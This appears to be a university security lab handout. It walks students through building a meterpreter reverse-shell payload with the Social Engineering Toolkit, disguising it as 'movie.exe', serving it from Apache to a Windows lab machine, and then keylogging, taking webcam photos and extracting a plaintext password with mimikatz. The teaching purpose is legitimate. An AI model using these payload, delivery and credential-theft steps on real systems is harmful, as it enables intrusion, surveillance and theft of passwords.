CNIT 123 Proj 4: Creating Infectious Media with the Social Engineering Toolkit (15 pts.)

What You Need

Purpose

We will use Kali Linux and the Social Engineering Toolkit to create a an infectious EXE file.

A user who runs that file.

Finding the Attacker's IP Address

On your Linux machine, in a Terminal window, execute this command:
ifconfig
Find your IP address and make a note of it. In the example below, it is 192.168.119.169.

Launch the Social Engineering Toolkit

From the Kali desktop, at the top left, click Applications, "Exploitation Tools", "social engineering toolkit".

If it is the first time you ran it, you will need to agree to the Terms of Service.

The Social-Engineer Toolkit opens, as shown below:

If you see a message saying "Press [enter] to accept that SET is several months out of date and probably contains bugs and issues.", press Enter. If you see a message saying "Do you agree to the terms of service [y/n]: ", type y and press Enter.

Creating Infectious Media

Now select these options from the menus (note that the numbers may change as the toolkit is updated): As shown below, this message appears: "Payload has been exported to the default SET directory".

When you see the question: "Create a listener right now [yes|no]:", type yes and press Enter.

Troubleshooting

Sometime set fails and doesn't open the listener. If that happens, execute these commands to open a listener manually:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 5555
exploit

Delivering the Payload to the Windows Target

In Kali, open a new Terminal window and execute these commands. The first command puts the malicious file in the default directory for Apache, with an friendly-looking name, and the second one starts the Apache web server.
cp ~/.set/payload.exe /var/www/html/movie.exe

service apache2 start

Running the Malware on the Target Machine

On the target Windows machine, open a Web browser and open this URL, replacing the IP address with the IP address of your Kali machine:
http://192.168.119.130/movie.exe
The file "movie.exe" downloads. Bypass any warning boxes, double-click the file, and allow it to run.

Note: if you are using antivirus, you will need to disable it. You will also need to disable Windows Defender. If you have problems disabling your malware protection, use the Windows 2008 Server virtual machine, which has no malware protection.

Exploiting the Target

On the Kali Linux machine, you should see a "Meterpreter session 1 opened" message, as shown below.

Saving the Screen Image

Make sure the "Meterpreter session 1 opened" message is visible, as shown above.

Click on the host computer's desktop to make it active. Press the PrntScrn key to capture the whole screen.

YOU MUST SUBMIT WHOLE DESKTOP IMAGES FOR FULL CREDIT.

Save this image as a PNG file, named "Proj 4a from YOUR NAME"

Opening an Interactive Meterpreter Session

On your Kali machine, execute this command:
sessions -i 1
You should see the meterpreter > prompt, as shown below.

Post-Exploitation

You now own the target! Here are some fun meterpreter > commands to try:

screenshotGives you an image of the target's desktop
keyscan_startBegins capturing keys typed in the target. On the Windows target, open Notepad and type in some text, such as your name.
keyscan_dumpShows the keystrokes captured so far
webcam_listShows the available webcams (if any)
webcam_snapTakes a photo with the webcam
shellGives you a Windows Command Prompt on the target
exitLeaves the Windows Command Prompt

Stealing a Password

On the Kali Linux machine, in an open Meterpreter session, execute these commands:

load mimikatz

kerberos

The current user's password appears in plaintext, as shown below.

Saving the Screen Image

Make sure the plaintext password of P@ssw0rd is visible, as shown above.

Click on the host computer's desktop to make it active. Press the PrntScrn key to capture the whole screen.

YOU MUST SUBMIT WHOLE DESKTOP IMAGES FOR FULL CREDIT.

Save this image as a PNG file, named "Proj 4b from YOUR NAME"

Turning in Your Project

Email the images to cnit.123@gmail.com with a subject of "Proj 4 from YOUR NAME".

Last modified 9-23-16